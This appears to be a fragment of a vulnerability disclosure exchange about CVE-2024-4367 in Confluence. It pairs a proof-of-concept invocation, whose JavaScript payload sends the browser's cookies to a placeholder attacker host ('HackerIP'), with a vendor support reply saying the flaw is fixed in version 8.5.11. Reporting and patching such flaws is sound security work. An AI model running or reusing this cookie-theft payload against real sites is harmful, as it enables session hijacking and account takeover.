CVE-2024-4367.py "var xhr = new XMLHttpRequest(); xhr.open('GET', 'http://HackerIP:2024/?cookie=' + document.cookie, true); xhr.withCredentials = true; xhr.onreadystatechange = function() { if (xhr.readyState === 4 && xhr.status === 200) { console.log(xhr.responseText); } }; xhr.send();"
------
Hi Yong,
Thank you for reaching out. We can confirm that this vulnerability has been fixed in Confluence version 8.5.11. So, you can plan to upgrade Confluence and see if you are able to reproduce this behaviour by any chance.
In the context of why this is not populating under our Vulnerability Portal, we have initiated a discussion internally to fix this part.
Hope this information helps.
Thanks